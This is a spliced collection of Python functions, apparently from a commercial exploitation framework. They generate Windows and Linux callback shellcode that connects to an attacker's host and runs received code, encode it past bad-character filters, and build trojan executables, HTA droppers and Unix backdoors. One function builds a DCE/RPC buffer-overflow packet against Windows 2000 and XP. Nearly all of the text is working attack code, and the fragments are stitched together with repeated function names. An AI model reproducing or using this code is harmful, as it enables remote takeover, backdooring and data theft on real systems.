def createInjectToSelf(self, localhost, localport, injectme="", vProtect=False, movetostack=False):
"""
Returns the shellcode, but not encoded, and does not set
self.shellcode
"""
if injectme in ["", None]:
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp",{"subespval": 0}) #don't mess with eip
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {"port" : localport, "ipaddress" : localhost})
sc.addAttr("loadFDasreg", {"reg" : "esi"})
sc.addAttr("RecvExecDepSafe",None) #MOSDEF
sc.addAttr("ExitThread",None)
self.callback.argsDict["fromcreatethread"] = 0
injectme = sc.get()
sc = shellcodeGenerator.win32()
sc.vProtectSelf=vProtect
sc.addAttr("findeipnoesp", {"subespval": 0})
sc.addAttr("InjectToSelf", { "injectme" : injectme })
sc.addAttr("ExitThread", None)
shellcode=sc.get()
if movetostack:
sc = shellcodeGenerator.win32()
sc.standalone = 1
sc.addAttr("moveToStack", { "Length":len(shellcode) })
shellcode = sc.get() + shellcode
return shellcode
def createHeapSafeInject(self,
badstring,
localhost,
localport,
injectme="",
setdebugprivs=0):
if injectme in ["", None]:
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0x1000})
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {
"port": localport,
"ipaddress": localhost
})
sc.addAttr("CreateThreadRecvExecWin32",
{"socketreg": "FDSPOT"}) #MOSDEF
#sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"})
sc.addAttr("ExitThread", None)
self.callback.argsDict["fromcreatethread"] = 1
injectme = sc.get()
# print "Dumping InjectMe Code:" + sc.getcode()
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0})
sc.addAttr("HeapSafeInject", {
"injectme": injectme,
"setdebugprivs": setdebugprivs
})
sc.addAttr("ExitThread", None)
injectcode = sc.get()
#print "Dumping HeapSafeInject Code:" + sc.getcode()
rawshellcode = injectcode
if badstring == "":
self.shellcode = rawshellcode
return rawshellcode
self.log("Raw shellcode (before encoding) is %d byte" %
len(rawshellcode))
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(badstring)
self.log(
"Encoding shellcode. This may take a while if we don't find a good value in the cache."
)
shellcode = encoder.encode(rawshellcode)
self.log("Done encoding shellcode.")
if shellcode == "":
self.log("Could not encode shellcode")
raise "ErrorEncodingShellcode"
self.setShellcode(shellcode)
return shellcode
def maketrojan(self):
host = self.callback.ip
port = self.callback.port
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0x1000})
if self.useSSL:
ssl = "s"
else:
ssl = ""
sc.addAttr("httpGetShellcode",
{"URL": "http%s://%s:%d/w" % (ssl, host, port)})
shellcode = sc.get()
myPElib = pelib.PElib()
self.mosdeftrojan = myPElib.createPEFileBuf(shellcode)
self.log("Writing out %d bytes to %s" %
(len(self.mosdeftrojan), self.trojanname))
self.htafile = self.file4hta(self.mosdeftrojan)
file(self.trojanname, "wb").write(self.htafile)
self.setInfo("%s - done" % (NAME))
ret = len(self.mosdeftrojan) != 0
return ret
def setup_mosdef_shellcode(self, nodetype):
host = self.callback.ip
port = self.callback.port
if nodetype == "win32Node":
self.log("Creating win32 shellcode to callback to %s:%s" %
(host, port))
from shellcode import shellcodeGenerator
sc = shellcodeGenerator.win32()
sc.vProtectSelf = True
sc.addAttr("findeipnoesp", {"subespval": 0}) #don't mess with eip
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {"port": port, "ipaddress": host})
sc.addAttr("loadFDasreg", {"reg": "esi"})
sc.addAttr("RecvExecDepSafe", None) #MOSDEF
sc.addAttr("ExitThread", None)
self.shellcode = sc.get()
elif nodetype == "win64Node":
self.log("Creating win64 shellcode to callback to %s:%s" %
(host, port))
p = payloads64.payloads()
asm = p.callback(host, port, universal=False)
bin = p.assemble(asm)
self.shellcode = bin
def createShellcode(self):
host = self.callback.ip
port = self.callback.port
self.localhost = host
self.localport = port
self.INFO, self.ADDY = targets[self.version]
from shellcode import shellcodeGenerator
self.log("Creating shellcode to callback to %s:%s" % (host, port))
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp",
{"subespval": self.subesp}) #don't mess with eip
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {"port": port, "ipaddress": host})
sc.addAttr("CreateThreadRecvExecWin32",
{"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("ExitThread", None)
rawshellcode = sc.get()
if self.badstring == "":
self.shellcode = rawshellcode
return 1
self.log("Raw shellcode (before encoding) is %d byte" %
len(rawshellcode)) #set up the shellcode
self.encodeshellcode(rawshellcode)
return 1
def createShellcode(self):
""" create shellcode for the win """
# ret = self.createSmallWin32GOShellcode()
from shellcode import shellcodeGenerator
sc = shellcodeGenerator.win32()
sc.addAttr("tcpconnect", {
"port": self.callback.port,
"ipaddress": self.callback.ip
})
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"})
self.shellcode = sc.get()
from encoder import chunkedaddencoder
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(self.badstring)
self.shellcode = encoder.encode(self.shellcode)
# these are just the numbers from makesploit() below
offset = 492
size = 12
subesp = 5000
self.easychunk(offset, size, subesp)
self.log("Total length of shellcode=%d" % len(self.shellcode))
return self.shellcode
def createShellcode(self):
"default linux/windows callback"
try:
if targets[self.version][0].lower().find("linux") > -1:
sc = shellcodeGenerator.linux_X86()
sc.addAttr("connect", {"ipaddress":self.callback.ip, "port":self.callback.port})
sc.addAttr("read_and_exec", {"fdreg": "esi"})
self.shellcode = sc.get()
elif targets[self.version][0].lower().find("windows") > -1:
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0x1000 })
#sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {"port":self.callback.port, "ipaddress":self.callback.ip})
sc.addAttr("RecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("ExitThread", None)
self.shellcode = sc.get()
except:
print "[!] did you forget to set -l -d on the commandline !?"
self.shellcode = "\xcc" * 256
print "[!] shellcode length is %d bytes"% len(self.shellcode)
return self.shellcode
def createShellcode(self):
localhost = self.callback.ip
localport = self.callback.port
from shellcode import shellcodeGenerator
sc = shellcodeGenerator.win32()
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {"port": localport, "ipaddress": localhost})
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF
self.shellcode = sc.get()
from encoder import chunkedaddencoder
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(self.badstring)
self.log("Encoding shellcode")
self.shellcode = encoder.encode(self.shellcode)
if self.shellcode == "":
self.log("Problem encoding shellcode")
return 0
self.shellcode = self.tag2 + self.tag1 + self.shellcode
from shellcode import win32shell
self.searchcode = win32shell.getsearchcode(self.tag1, self.tag2)
from encoder import addencoder
encoder = addencoder.inteladdencoder()
encoder.setbadstring(self.searchbadstring)
self.encodedsearchcode = encoder.encode(self.searchcode)
if not self.encodedsearchcode:
return None
self.log(
"Length of search shellcode: %d, length of real shellcode: %d\n" %
(len(self.searchcode), len(self.shellcode)))
return 1
def createShellcode(self):
#localhost=self.callback.ip
#localport=self.callback.port
sc = shellcodeGenerator.win32()
#sc.addAttr("ForkLoad", None)
# the to fork code
sc.addAttr("findeipnoesp",
{"subespval": self.subesp}) #don't mess with eip
sc.addAttr("isapiGOFindSock", None)
sc.addAttr("ExitThread", None)
#set up the shellcode
self.shellcode = sc.get()
self.log("Size of raw shellcode is %d" % len(self.shellcode))
encoder = chunkedaddencoder.intelchunkedaddencoder()
#these are the characters not allowed by the exploit
encoder.setbadstring(self.badstring)
self.log(
"Encoding shellcode. This may take a while if we don't find a good value in the cache."
)
shellcode = encoder.encode(self.shellcode)
self.log("Done encoding shellcode.")
if shellcode == "":
self.log("Could not encode shellcode")
return 0
#debug int
#shellcode="\xcc"+shellcode
self.setShellcode(shellcode)
self.log("Size of encoded shellcode is %d" % len(self.shellcode))
return 1
def createShellcode(self):
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp",
{"subespval": self.subesp}) #don't mess with eip
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {
"port": self.callback.port,
"ipaddress": self.callback.ip
})
sc.addAttr("CreateThreadRecvExecWin32",
{"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("TerminateThread", None)
rawshellcode = sc.get()
print "[!] RAW Shellcode len: %d bytes" % len(rawshellcode)
#then do a xor enconding using the real badstring
encoder = xorencoder.simpleXOR()
encoder.setbadstring(self.badstring)
encoder.find_key(rawshellcode)
self.shellcode = encoder.encode(rawshellcode)
print "[!] Shellcode len: %d bytes" % len(self.shellcode)
if not len(self.shellcode):
return None
return self.shellcode
def getHTTPStage2(self, httpHost, httpPort, ssl=""):
" get the full protocol HTTP code over and a client id "
from shellcode import shellcodeGenerator
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0x1000 })
args = {}
# now it switches to a /c with the client id
# and the protocol switches to double GETS
args["URL"] = "http%s://%s:%d/c"%(ssl, httpHost, httpPort)
devlog("http_mosdef","[!] getting new client ID ..")
# XXX: is fine as the parent function (handle) is threaded and lock protected
args["ID"] = self.get_new_client_id()
self.last_client[-1].urlhost = httpHost
self.last_client[-1].urlport = httpPort
self.last_client[-1].ssl = ssl
sc.addAttr("httpGetShellcode", args)
devlog("http_mosdef", "client connect url: %s client id: %s"% (args["URL"], args["ID"]))
return sc.get()
def getMosdefLoop(self, pSocket):
""" returns a mosdef loop payload with an fd set """
ntype = self.node.nodetype
if ntype == "win32Node":
self.nlog("Generating 32bit Mosdef Shellcode")
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp",None)
# we might be going into a process that doesn't have winsock loaded !
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
# XXX: to be DEP safe it needs an VirtualAlloc loop that just makes sre
# XXX: code ends up in RWX paged memory, and not on the stack ;)
sc.addAttr("RecvExecAllocLoop", {"fd" : pSocket})
sc.addAttr("ExitThread", {"closesocket":True})
return sc.get()
elif ntype == "win64Node":
self.nlog("Generating 64bit Mosdef Shellcode")
p = secondstages64.SecondStages()
asm = p.recvExecAllocLoopWithSocket(pSocket)
return p.assemble(asm)
else:
# XXX:
self.log_error("Node type not supported")
def createShellcode(self):
host = self.callback.ip
port = self.callback.port
#return self.createWin32Shellcode(self.badstring,host,port)
#should be createWin32HTTPShellcode()
#return self.createTestShellcode()
#return self.createWin32ThreadCallbackShellcode()
#we set the virtual protect flag here because on Vista our shellcode is mapped 'READ_ONLY'
httpWrapper = ''
try:
if self.HTTPMOSDEF:
print '[!] using HTTP MOSDEF tunneling ..'
sc = shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval': 0x1000})
if self.useSSL:
ssl = 's'
else:
ssl = ''
sc.addAttr('httpGetShellcode',
{'URL': 'http%s://%s:%d' % (ssl, host, port)})
httpWrapper = sc.get()
print '[!] HTTP MOSDEF len: %d bytes' % (len(httpWrapper))
except:
httpWrapper = ''
self.shellcode = self.createInjectToSelf(host,
port,
injectme=httpWrapper,
movetostack=True)
#print prettyprint(self.shellcode)
return self.shellcode
def createShellcode(self):
import shellcode.shellcodeGenerator as shellcodeGenerator
sc = shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval': 3000})
sc.addAttr('revert_to_self_before_importing_ws2_32', None)
sc.addAttr('tcpconnect', {
'port': self.callback.port,
'ipaddress': self.callback.ip
})
sc.addAttr('CreateThreadRecvExecWin32',
{'socketreg': 'FDSPOT'}) #MOSDEF
sc.addAttr('ExitThread', None)
rawshellcode = sc.get()
import encoder.xorencoder as xorencoder
encoder = xorencoder.simpleXOR()
encoder.setbadstring(self.badstring)
ret = encoder.find_key(rawshellcode)
if ret == 0:
self.log('Could not find a key for this shellcode!')
raise Exception, 'No shellcode generated'
self.shellcode = encoder.encode(rawshellcode)
if self.shellcode == '':
raise Exception, 'No shellcode generated'
self.log('Xor key used: %x' % (encoder.getkey()))
self.log('Length of shellcode=%s' % (len(self.shellcode)))
return self.shellcode
def createShellcode(self):
from shellcode import shellcodeGenerator
httpWrapper = ""
try:
if self.HTTPMOSDEF == True:
self.log("[!] using HTTP MOSDEF tunneling payload ..")
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0x1000})
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
# this is what you need your exploits to port them to HTTPS MOSDEF compatibility
if self.useSSLMOSDEF == True:
ssl = "s"
else:
ssl = ""
# end of change
sc.addAttr(
"httpGetShellcode", {
"URL":
"http%s://%s:%d" %
(ssl, self.callback.ip, self.callback.port)
})
httpWrapper = sc.get()
self.log("[!] HTTP MOSDEF len: %d bytes" % len(httpWrapper))
except Exception, msg:
#print "Exception in HTTP MOSDEF Payload generation: %s" % msg
httpWrapper = ""
def createHeapShellcode(self):
#for all of the exploits to prevent the heap corruption from disturbing us
if self.callback == None:
self.log("Cannot create heap shellcode without a callback...")
host = self.callback.ip
port = self.callback.port
# switch into bind port mode on "0.0.0.0"
if self.am_bind_shellcode():
key = ("WIN32 HEAP BIND", self.callback.port, self.badstring)
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0x1000})
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("BindMosdef", {"port": self.callback.port})
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("ExitThread", None)
injectcode = sc.get()
self.shellcode = self.createHeapSafeInjectIntoProcess(
self.badstring, host, port, smallcode=0, injectme=injectcode)
else:
key = ("WIN32 HEAP CALLBACK", host, port, self.badstring)
#if smallcode is zero, then use fromcreatethread if running from commandline.
# defaults to LSASS.EXE and lsass.exe
self.shellcode = self.createHeapSafeInjectIntoProcess(
self.badstring, host, port, smallcode=0)
return self.shellcode
def createShellcode(self):
#get us a clean stack to play with and save the original EBP for continuation of execution
injectme = self.createWin32Shellcode_universal(self.badstring, self.callback.ip, self.callback.port)
sc = shellcodeGenerator.win32()
sc.vProtectSelf=False
sc.vAllocSelf = False
sc.addAttr("findeipnoesp", {"subespval": 0})
sc.addAttr("InjectToSelf", { "injectme" : injectme })
self.shellcode = sc.get()
self.badstring = "\00"
enc=xorencoder.simpleXOR()
enc.subesp=5000
enc.setbadstring(self.badstring)
ret=enc.find_key(self.shellcode)
if ret==0:
self.log("Could not generate key for this shellcode!")
raise Exception, "No shellcode generated"
self.shellcode=enc.encode(self.shellcode)
if self.shellcode=="":
raise Exception, "No shellcode generated"
self.log("Xor key used: %x"%enc.getkey())
self.log("Length of shellcode=%s"%len(self.shellcode))
return len(self.shellcode)
def createShellcode(self):
sc=shellcodeGenerator.win32()
sc.addAttr("findeipnoesp",{"subespval": self.subesp}) #don't mess with eip
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect",{"port":self.callback.port,"ipaddress":self.callback.ip})
sc.addAttr("CreateThreadRecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("ExitThread",None)
rawshellcode=sc.get()
print "[!] RAW Shellcode len: %d bytes" % len(rawshellcode)
#first encode to nibble
enc = nibble_encoder.intel_nibbleencoder()
bad = ""
for i in range(ord('A'),ord('Z')+1):
#for a-z inclusive, these are badchars
bad+=chr(i)
enc.setbadstring(bad)
rawshellcode = enc.encode(rawshellcode)
print "[!] Nibble Encoded Shellcode len: %d bytes" % len(rawshellcode)
#then do a xor enconding using the real badstring
encoder = xorencoder.simpleXOR()
encoder.setbadstring(self.badstring)
encoder.find_key(rawshellcode)
self.shellcode = encoder.encode(rawshellcode)
print "[!] Shellcode len: %d bytes" % len(self.shellcode)
if not len(self.shellcode):
return None
return self.shellcode
def createShellcode(self):
host=self.callback.ip
port=self.callback.port
self.version=self.argsDict["version"]
if self.version==0:
self.test()
if self.version==0:
self.log("Could not find version - no shellcode created")
return ""
if self.version == SUNONEWIN32 or self.version == SUNONEWIN32_2K:
self.remoteport = port
from shellcode import shellcodeGenerator
#sc = shellcodeGenerator.win32()
#sc.addAttr("tcpconnect", {"port" : port, "ipaddress" : host})
#sc.addAttr("initstackswap", None)
#sc.addAttr("stackSwap", None)
#self.shellcode = sc.get()
#encoder = chunkedaddencoder.intelchunkedaddencoder()
#encoder.setbadstring(self.badstring)
#self.log("Encoding shellcode")
#self.shellcode = encoder.encode(self.shellcode)
#if self.shellcode == "":
# self.log("Problem encoding shellcode")
# return 0
# MOSDEF
sc = shellcodeGenerator.win32()
self.log("Generating shellcode with port %s and ip %s"%(port,host))
sc.addAttr("tcpconnect", {"port" : port, "ipaddress" : host})
sc.addAttr("RecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
self.shellcode = sc.get()
self.log("Raw win32 shellcode length: %d"%len(self.shellcode))
return self.shellcode
def createShellcode(self):
if not self.callback:
self.log("No callback needed for this Node type")
else:
host = self.callback.ip
port = self.callback.port
caps = self.argsDict["passednodes"][0].capabilities
if "win32api" in caps:
self.log("Creating shellcode to callback to %s:%s" % (host, port))
from shellcode import shellcodeGenerator
sc = shellcodeGenerator.win32()
#sc.addAttr("ForkLoad", None)
# the to fork code
sc.addAttr("findeipnoesp", {"subespval": 0}) #don't mess with eip
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {"port": port, "ipaddress": host})
sc.addAttr("CreateThreadRecvExecWin32",
{"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("ExitThread", None)
self.shellcode = sc.get()
self.listenerArgsDict["fromcreatethread"] = 1
return self.shellcode
else:
self.log("Not creating shellcode for this node type")
return ""
def createShellcode(self):
localhost = self.callback.ip
localport = self.callback.port
sc = shellcodeGenerator.win32()
sc.addAttr('SearchCodeSafeSEH', {'tag': 0x46494a45}) #'c00k'
sc.standalone = 1
self.searchcode = sc.get()
open("searchcode.s", "w").write(sc.code)
#sc = shellcodeGenerator.win32()
#sc.addAttr("OrigamiInjectSmall", { "ipaddress": localhost, "port": localport, "processname": "CdfSvc.exe"})
#sc.addAttr("ExitThread", None)
#self.callback.argsDict["fromcreatethread"] = 1
self.shellcode = sc.get()
open("shellcode.s", "w").write(sc.code)
import shellcode.clean.windows.payloads as payloads
p = payloads.payloads()
sc = p.forkload(localhost,
localport,
restorehash=True,
load_winsock=True,
processname="dmremote")
self.shellcode = p.assemble(sc)
#self.createWin32Shellcode(self.badstring,localhost,localport)
#self.createHeapSafeInjectIntoProcess(self.badstring, localhost, localport, smallcode=1, processname="CdfSvc.exe", backupprocess="cdfsvc.exe")
# Fixup Code:
code = "movl $0x%08x, %%eax\nmov %%eax, (0x%08x) " % (
(self.PTR + 0x2C), (self.PTR + 0x2C))
fixup_code = mosdef.assemble(code, "X86")
self.shellcode = struct.pack(
"<L", 0x46494a45) * 2 + fixup_code + self.shellcode
return self.shellcode
def get_trojan(self):
trojan = ''
try:
sc = shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval': 0})
sc.addAttr('revert_to_self_before_importing_ws2_32', None)
sc.addAttr('tcpconnect', {
'port': self.callback_port,
'ipaddress': self.callback_ip
})
mosdef_type = self.engine.getMosdefType(
canvasengine.WIN32MOSDEF_INTEL)
mosdef_id = self.engine.getNewMosdefID(self)
sc.addAttr("send_universal", {
"mosdef_type": mosdef_type,
"mosdef_id": mosdef_id
})
sc.addAttr("RecvExecDepSafe", {'socketreg': 'FDSPOT'})
sc.addAttr("ExitThread", None)
sc.vAllocSelf = True #we need to move to another page!
myPElib = pelib.PElib()
trojan = myPElib.createPEFileBuf(sc.get())
except:
import traceback
traceback.print_exc(file=sys.stderr)
return trojan
def createShellcode(self):
host = self.callback.ip
port = self.callback.port
self.localhost = host
self.localport = port
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0x1000})
#callback
#sc.addAttr("revert_to_self_before_importing_ws2_32", None) ws2_32 already loaded
sc.addAttr("tcpconnect", {"port": port, "ipaddress": host})
sc.addAttr("CreateThreadRecvExecWin32",
{"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("ExitThread", None)
#GOcode too big for now, use the ordinal code later
#sc.addAttr("GOFindSock",None)
#sc.addAttr("LoadRegAsFD", {"reg" : "esi"})
#sc.addAttr("CreateThreadRecvExecWin32",{"socketreg": "FDSPOT"}) #MOSDEF
#sc.addAttr("ExitThread", None)
rawshellcode = sc.get()
"""
self.log("Raw shellcode (before encoding) is %d byte"%len(rawshellcode))
encoder= addencoder.inteladdencoder()
encoder.setbadstring(self.badstring)
self.log( "Encoding shellcode. This may take a while if we don't find a good value in the cache.")
shellcode=encoder.encode(rawshellcode)
self.log( "Done encoding shellcode.")
if shellcode=="":
self.log( "Could not encode shellcode")
raise "ErrorEncodingShellcode"
"""
cnt = 0xff
while cnt:
shellcode = self.xorEncode(rawshellcode, cnt)
if shellcode != "":
break
else:
cnt -= 1
if len(shellcode) == 0:
raise Exception, "Could not encode shellcode!"
"""
print "< %d" % shellcode.count("<")
print "> %d" % shellcode.count(">")
print "@ %d" % shellcode.count("@")
print ": %d" % shellcode.count(":")
print "\\r %d" % shellcode.count("\r")
print "\\n %d" % shellcode.count("\n")
print "NULL %d" % shellcode.count("\x00")
for each in shellcode:
print "%2.x " % ord(each),
print "\n"
"""
self.shellcode = shellcode
self.log("length of real shellcode: %d" % (len(self.shellcode)))
return self.shellcode
def createShellcode(self):
sc = shellcodeGenerator.win32()
sc.addAttr("GOFindSock", None)
sc.addAttr("RecvExecWin32", None)
self.shellcode = sc.get()
self.log("[!] Unencoded GOFindSock + RecvExecWin32 len: %d" %
len(self.shellcode))
return self.shellcode
def createShellcode(self):
# for test only
localhost = "192.168.1.103"
localport = 8090
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0x1000})
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {"port": localport, "ipaddress": localhost})
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) # MOSDEF
sc.addAttr("ExitThread", None)
injectme = sc.get()
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0})
sc.addAttr("InjectToSelf", {"injectme": injectme})
sc.addAttr("ExitThread", None)
return sc.get()
def createShellcode(self):
sc = shellcodeGenerator.win32()
sc.addAttr('findeipnoesp', {'subespval': 0})
sc.addAttr('revert_to_self_before_importing_ws2_32', None)
sc.addAttr('tcpconnect', {
'port': self.callback.port,
'ipaddress': self.callback.ip
})
sc.addAttr('CreateThreadRecvExecWin32',
{'socketreg': 'FDSPOT'}) #MOSDEF
sc.addAttr('ExitThread', None)
rawshellcode = sc.get()
#Due to unicode encoding strangeness between XP SP0 and XP SP1a, the following
#encoder was implemented to avoid all the characters between 0x80 and 0x9f
while (len(rawshellcode) % 4) != 0:
rawshellcode += 'A'
SIZE = len(rawshellcode) / 4
if SIZE > 0xff: #should be enough?
raise Exception, 'Shellcode too long!'
while (SIZE >= 0x80) and (
SIZE <= 0x9f): #increase SIZE if within the badchars range
rawshellcode += 'BBBB'
SIZE += 1
#the encoding scheme is pretty self explanatory
encodedshellcode = ''
for i in range(0, len(rawshellcode), 4):
L = struct.unpack('<L', rawshellcode[i:i + 4])[0]
HIGH = ((L & 0xf0f0f0f0) >> 4) + 0x40404040
LOW = (L & 0x0f0f0f0f) + 0x40404040
encodedshellcode += struct.pack('<LL', HIGH, LOW)
decoder = ''
decoder += '\xd9\xee' # 0: fldz
decoder += '\xd9\x74\x24\xf4' # 2: fnstenv 0xfffffff4(%esp)
decoder += '\x5e' # 6: pop %esi
decoder += '\x6a\x28' # 7: push $0x28
decoder += '\x59' # 9: pop %ecx
decoder += '\x03\xf1' # a: add %ecx,%esi
decoder += '\x56' # c: push %esi
decoder += '\x5f' # d: pop %edi
decoder += '\xb1' + chr(SIZE) # e: mov $SIZE,%cl
decoder += '\xad' #10: lods %ds:(%esi),%eax
decoder += '\x2d\x40\x40\x40\x40' #11: sub $0x40404040,%eax
decoder += '\xc1\xe0\x04' #16: shl $0x4,%eax
decoder += '\x50' #19: push %eax
decoder += '\x5a' #1a: pop %edx
decoder += '\xad' #1b: lods %ds:(%esi),%eax
decoder += '\x2d\x40\x40\x40\x40' #1c: sub $0x40404040,%eax
decoder += '\x03\xc2' #21: add %edx,%eax
decoder += '\xab' #23: stos %eax,%es:(%edi)
decoder += '\xe2\xea' #24: loop 0x10
decoder += '\x41' #26: inc %ecx
decoder += '\x41' #27: inc %ecx
self.shellcode = decoder + encodedshellcode
self.log('Total shellcode length=%d' % (len(self.shellcode)))
return self.shellcode
def buildDcePacket(self):
self.info,self.eip=targets[self.version]
data=''
packet=''
data+='\\\0\\\0'
if self.version==1: #Windows 2000 SP4, XP SP1a
bufferXP='A'*(0xf048-0xef20)
bufferXP+=struct.pack('<L',self.eip[1]) #eip XP
bufferXP+='C'*8
data+=bufferXP
buffer2K=self.shellcode
buffer2K+='D'*(0xf1d0-0xeccc-len(self.shellcode)-len(bufferXP))
buffer2K+=struct.pack('<L',self.eip[0]) #eip 2000
buffer2K+='F'*8
buffer2K+=mosdef.assemble('jmp $-%d'%(len(buffer2K)+5),'x86') #jmp back
data+=buffer2K
if (len(data)%2)==1:
data+='G'
data+='\\\0H\0'
packet+=intel_order(1)
packet+=s_dce_win2k_unistring('F')
packet+=s_dce_raw_unistring(data)
packet+=intel_order(0)
elif self.version>=2: #XP SP2 with DEP
from shellcode import shellcodeGenerator
sc=shellcodeGenerator.win32()
sc.addAttr('SmallSearchCode',{'tag':0x6b303063}) #'c00k'
sc.standalone=1
searchcode=self.wc_encodeshellcode(sc.get())
bufferXP=searchcode
bufferXP+='A'*(0xf000-0xeeec-len(bufferXP))
bufferXP+=mosdef.assemble('jmp $-%d'%(len(bufferXP)+5),'x86') #jmp back
bufferXP+='B'*(0xf014-0xeeec-len(bufferXP))
bufferXP+=struct.pack('<L',self.eip[0])
bufferXP+='C'*8
bufferXP+=struct.pack('<L',self.eip[1])
bufferXP+=struct.pack('<L',self.eip[3])
bufferXP+='D'*16
bufferXP+=struct.pack('<L',self.eip[2])
bufferXP+='E'*4
bufferXP+='\xeb\xd6' #esi is restored from here, jmp back
data+=bufferXP
data+='\\\x00F\x00'
if (len(self.shellcode)%2)==1:
self.shellcode+='G'
packet+=intel_order(1)
packet+=s_dce_raw_unistring('c00k'+self.shellcode)
packet+=s_dce_raw_unistring(data)
packet+=intel_order(0)
return packet
def buildTrojan(self, type="Linux", arch="X86"):
"build a MOSDEF based trojan binary"
mosdeftrojan = ""
if type in ["Linux", "Solaris"]:
from MOSDEF import makeexe
from MOSDEF.cc import threadsafe_cc_main
self.log("[!] Compiling Unix trojan")
infilename = "backdoors/cback_mmap_rwx.c"
vars = {}
vars['CBACK_PORT'] = self.callback.port
vars['CBACK_ADDR'] = str2int32(socket.inet_aton(self.callback.ip))
self.log("[!] Callback address is %s" % vars['CBACK_ADDR'])
cc_command = []
for var in vars:
cc_command += ["-D", "%s=%s" % (var, vars[var])]
cc_command += ["-v", "-m", type, "-p", arch, infilename]
self.log("[!] CC command: %s" % cc_command)
mosdeftrojan = threadsafe_cc_main(cc_command)
if not mosdeftrojan:
self.log("[X] Was unable to create trojan!")
return ""
self.log("[!] Length of CC compiled trojan: %s" %
len(mosdeftrojan))
elif type in ["Windows"]:
from MOSDEF import pelib
from shellcode import shellcodeGenerator
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp", {"subespval": 0}) #don't mess with eip
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {
"port": self.callback.port,
"ipaddress": self.callback.ip
})
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF
sc.addAttr("ExitThread", None)
shellcode = sc.get()
myPElib = pelib.PElib()
mosdeftrojan = myPElib.createPEFileBuf(shellcode)
if mosdeftrojan == None:
self.log("Some sort of error compiling our PE")
return ""
self.log("[!] Win32 MOSDEF Trojan compiled to %d bytes" %
len(mosdeftrojan))
return mosdeftrojan
def createShellcode(self):
from shellcode import shellcodeGenerator
sc=shellcodeGenerator.win32()
sc.addAttr ('tcpconnect',{'port':self.callback.port,'ipaddress':self.callback.ip})
sc.addAttr('SmallRecvExecWin32',{'socketreg':'FDSPOT'}) #MOSDEF
sc.addAttr('UseWS2Ordinal',None)
rawshellcode=sc.get()
raw=sc.get()
# ASCII encoder
encoder=printable.intelprintableencoder()
self.shellcode=encoder.encode (raw)
return self.shellcode
def createShellcode(self):
from shellcode import shellcodeGenerator
sc=shellcodeGenerator.win32()
sc.addAttr('findeipnoesp',None)
if self.version==1:
sc.addAttr('Fix RtlEnterCriticalSection',{'SimpleFix':1})
else:
sc.addAttr('UseWS2Ordinal',None)
sc.addAttr('tcpconnect',{'port':self.callback.port,'ipaddress':self.callback.ip})
sc.addAttr('SmallRecvExecWin32',{'socketreg':'FDSPOT'}) #MOSDEF
print sc.getcode()
self.shellcode=sc.get()
return self.shellcode
def create_shellcode(self):
host = self.callback_host
port = self.callback_port
mosdef_type = self.engine.getMosdefType(canvasengine.WIN32MOSDEF_INTEL)
mosdef_id = self.engine.getNewMosdefID(self)
sc = shellcodeGenerator.win32()
sc.addAttr("findeipnoesp",
{"subespval": self.subesp}) #don't mess with eip
sc.addAttr("revert_to_self_before_importing_ws2_32", None)
sc.addAttr("tcpconnect", {"port": port, "ipaddress": host})
sc.addAttr("send_universal", {
"mosdef_type": mosdef_type,
"mosdef_id": mosdef_id
})
